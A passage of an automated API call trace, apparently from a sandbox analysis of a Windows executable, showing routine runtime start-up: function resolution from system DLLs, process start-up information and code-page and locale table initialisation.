(hModule=0x75130000, lpProcName="WriteFile") returned 0x75156590 [0300.447] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleCP") returned 0x75156860 [0300.450] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0300.450] GetProcAddress (hModule=0x75130000, lpProcName="IsProcessorFeaturePresent") returned 0x75149680 [0300.450] GetProcAddress (hModule=0x75130000, lpProcName="ReadFile") returned 0x751564a0 [0300.450] GetProcAddress (hModule=0x75130000, lpProcName="GetStartupInfoW") returned 0x7514a080 [0300.450] GetProcAddress (hModule=0x75130000, lpProcName="UnhandledExceptionFilter") returned 0x751728e0 [0300.450] GetProcAddress (hModule=0x75130000, lpProcName="SetUnhandledExceptionFilter") returned 0x7514a2c0 [0300.450] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75156020 [0300.450] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751477b0 [0300.450] GetProcAddress (hModule=0x75130000, lpProcName="TerminateProcess") returned 0x7514fbc0 [0300.450] GetProcAddress (hModule=0x75130000, lpProcName="TlsAlloc") returned 0x75149a70 [0300.451] GetProcAddress (hModule=0x75130000, lpProcName="TlsGetValue") returned 0x75141ba0 [0300.451] GetProcAddress (hModule=0x75130000, lpProcName="TlsSetValue") returned 0x75141da0 [0300.451] GetProcAddress (hModule=0x75130000, lpProcName="TlsFree") returned 0x75149930 [0300.451] GetProcAddress (hModule=0x75130000, lpProcName="IsValidCodePage") returned 0x7514a090 [0300.451] GetProcAddress (hModule=0x75130000, lpProcName="GetACP") returned 0x75148770 [0300.451] GetProcAddress (hModule=0x75130000, lpProcName="GetOEMCP") returned 0x7514fd10 [0300.451] GetProcAddress (hModule=0x75130000, lpProcName="GetCPInfo") returned 0x75149fc0 [0300.451] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessHeap") returned 0x75147910 [0300.451] GetProcAddress (hModule=0x75130000, lpProcName="RtlUnwind") returned 0x75149a80 [0300.451] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75142dc0 [0300.451] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x75141d90 [0300.451] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x75142b90 [0300.451] GetProcAddress (hModule=0x75130000, lpProcName="GetEnvironmentStringsW") returned 0x7514a3b0 [0300.451] GetProcAddress (hModule=0x75130000, lpProcName="FreeEnvironmentStringsW") returned 0x7514a0f0 [0300.452] GetProcAddress (hModule=0x75130000, lpProcName="HeapReAlloc") returned 0x779cbae0 [0300.452] GetProcAddress (hModule=0x75130000, lpProcName="SetEndOfFile") returned 0x751564f0 [0300.452] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74c60000 [0300.452] GetProcAddress (hModule=0x74c60000, lpProcName="GetTokenInformation") returned 0x74c7ed40 [0300.452] GetProcAddress (hModule=0x74c60000, lpProcName="RegDeleteKeyW") returned 0x74c7fca0 [0300.452] GetProcAddress (hModule=0x74c60000, lpProcName="LookupPrivilegeValueW") returned 0x74c795e0 [0300.452] GetProcAddress (hModule=0x74c60000, lpProcName="AdjustTokenPrivileges") returned 0x74c80680 [0300.452] GetProcAddress (hModule=0x74c60000, lpProcName="OpenProcessToken") returned 0x74c7ee90 [0300.452] GetProcAddress (hModule=0x74c60000, lpProcName="RegSetValueExW") returned 0x74c7f0a0 [0300.452] GetProcAddress (hModule=0x74c60000, lpProcName="RegQueryValueExW") returned 0x74c7ed60 [0300.452] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyExW") returned 0x74c7ed80 [0300.452] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyW") returned 0x74c7f590 [0300.464] GetProcAddress (hModule=0x74c60000, lpProcName="RegCreateKeyW") returned 0x74c806c0 [0300.464] GetProcAddress (hModule=0x74c60000, lpProcName="RegCloseKey") returned 0x74c7efa0 [0300.464] GetProcAddress (hModule=0x74c60000, lpProcName="LookupAccountSidW") returned 0x74c7f7b0 [0300.464] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74eb0000 [0300.464] GetProcAddress (hModule=0x74eb0000, lpProcName="PrintDlgW") returned 0x74ebc6a0 [0300.464] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77370000 [0300.464] GetProcAddress (hModule=0x77370000, lpProcName="StartPage") returned 0x7741ee10 [0300.464] GetProcAddress (hModule=0x77370000, lpProcName="EndDoc") returned 0x773f55a0 [0300.464] GetProcAddress (hModule=0x77370000, lpProcName="StartDocW") returned 0x773f57e0 [0300.464] GetProcAddress (hModule=0x77370000, lpProcName="SetMapMode") returned 0x773f9590 [0300.464] GetProcAddress (hModule=0x77370000, lpProcName="GetDeviceCaps") returned 0x773f0820 [0300.464] GetProcAddress (hModule=0x77370000, lpProcName="EndPage") returned 0x7741fbc0 [0300.465] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ad0000 [0300.465] GetProcAddress (hModule=0x74ad0000, lpProcName="SendMessageW") returned 0x74ae38f0 [0300.465] GetProcAddress (hModule=0x74ad0000, lpProcName="DialogBoxIndirectParamW") returned 0x74afb6b0 [0300.465] GetProcAddress (hModule=0x74ad0000, lpProcName="EndDialog") returned 0x74afb430 [0300.465] GetProcAddress (hModule=0x74ad0000, lpProcName="LoadCursorW") returned 0x74ae7740 [0300.465] GetProcAddress (hModule=0x74ad0000, lpProcName="InflateRect") returned 0x74af74e0 [0300.465] GetProcAddress (hModule=0x74ad0000, lpProcName="GetSysColorBrush") returned 0x74afefa0 [0300.465] GetProcAddress (hModule=0x74ad0000, lpProcName="SetCursor") returned 0x74b04ed0 [0300.465] GetProcAddress (hModule=0x74ad0000, lpProcName="SetWindowTextW") returned 0x74af4580 [0300.465] GetProcAddress (hModule=0x74ad0000, lpProcName="GetDlgItem") returned 0x74af1540 [0300.465] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x74730000 [0300.465] GetProcAddress (hModule=0x74730000, lpProcName="GetFileVersionInfoW") returned 0x74731580 [0300.465] GetProcAddress (hModule=0x74730000, lpProcName="VerQueryValueW") returned 0x74731500 [0300.466] GetProcAddress (hModule=0x74730000, lpProcName="GetFileVersionInfoSizeW") returned 0x74731560 [0300.466] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0300.466] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0300.466] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x60951346, dwHighDateTime=0x1d45ac6)) [0300.466] GetCurrentThreadId () returned 0xce8 [0300.466] GetCurrentProcessId () returned 0xe54 [0300.466] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff68 | out: lpPerformanceCount=0x19ff68*=34792864438) returned 1 [0300.466] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0300.466] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x7514a330 [0300.466] GetProcAddress (hModule=0x75130000, lpProcName="FlsFree") returned 0x7514f400 [0300.466] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75147580 [0300.466] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x75149910 [0300.467] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionEx") returned 0x75156030 [0300.467] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventExW") returned 0x75155f90 [0300.467] GetProcAddress (hModule=0x75130000, lpProcName="CreateSemaphoreExW") returned 0x75155ff0 [0300.467] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadStackGuarantee") returned 0x7514a5d0 [0300.467] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolTimer") returned 0x7514a690 [0300.467] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolTimer") returned 0x779c40f0 [0300.467] GetProcAddress (hModule=0x75130000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bd630 [0300.467] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolTimer") returned 0x779becf0 [0300.467] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolWait") returned 0x75155720 [0300.467] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolWait") returned 0x779be140 [0300.467] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolWait") returned 0x779beb60 [0300.467] GetProcAddress (hModule=0x75130000, lpProcName="FlushProcessWriteBuffers") returned 0x779f9990 [0300.468] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779f5540 [0300.468] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessorNumber") returned 0x779e9dc0 [0300.468] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0300.468] GetProcAddress (hModule=0x75130000, lpProcName="CreateSymbolicLinkW") returned 0x75170a40 [0300.468] GetProcAddress (hModule=0x75130000, lpProcName="SetDefaultDllDirectories") returned 0x74e60790 [0300.468] GetProcAddress (hModule=0x75130000, lpProcName="EnumSystemLocalesEx") returned 0x7514f8a0 [0300.468] GetProcAddress (hModule=0x75130000, lpProcName="CompareStringEx") returned 0x7514fa30 [0300.468] GetProcAddress (hModule=0x75130000, lpProcName="GetDateFormatEx") returned 0x75171030 [0300.468] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x7514a000 [0300.468] GetProcAddress (hModule=0x75130000, lpProcName="GetTimeFormatEx") returned 0x751714b0 [0300.468] GetProcAddress (hModule=0x75130000, lpProcName="GetUserDefaultLocaleName") returned 0x7514a4f0 [0300.469] GetProcAddress (hModule=0x75130000, lpProcName="IsValidLocaleName") returned 0x751716f0 [0300.469] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x75149970 [0300.469] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentPackageId") returned 0x74de3c90 [0300.469] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount64") returned 0x75148710 [0300.469] GetProcAddress (hModule=0x75130000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0300.469] GetProcAddress (hModule=0x75130000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0300.469] GetCurrentThreadId () returned 0xce8 [0300.494] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x7891b1ce, hStdError=0x475810)) [0300.494] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0300.494] GetFileType (hFile=0x38) returned 0x2 [0300.494] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.494] GetFileType (hFile=0x3c) returned 0x2 [0300.495] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0300.495] GetFileType (hFile=0x40) returned 0x2 [0300.495] GetCommandLineW () returned="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" [0300.495] GetEnvironmentStringsW () returned 0x5b1e60* [0300.495] FreeEnvironmentStringsW (penv=0x5b1e60) returned 1 [0300.495] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0300.496] GetLastError () returned 0x0 [0300.497] SetLastError (dwErrCode=0x0) [0300.497] GetLastError () returned 0x0 [0300.497] SetLastError (dwErrCode=0x0) [0300.497] GetLastError () returned 0x0 [0300.497] SetLastError (dwErrCode=0x0) [0300.497] GetACP () returned 0x4e4 [0300.497] GetLastError () returned 0x0 [0300.497] SetLastError (dwErrCode=0x0) [0300.497] IsValidCodePage (CodePage=0x4e4) returned 1 [0300.497] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0300.497] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0300.497] GetLastError () returned 0x0 [0300.497] SetLastError (dwErrCode=0x0) [0300.497] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0300.497] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0300.497] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0300.497] GetLastError () returned 0x0 [0300.497] SetLastError (dwErrCode=0x0) [0300.497] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0300.497] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0300.497] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0300.497] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0300.497] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x5e\xb0\x91\x78\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0300.497] GetLastError () returned 0x0 [0300.497] SetLastError (dwErrCode=0x0) [0300.497] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0300.497] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā") returned 256 [0300.497] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0300.497] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0300.497] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 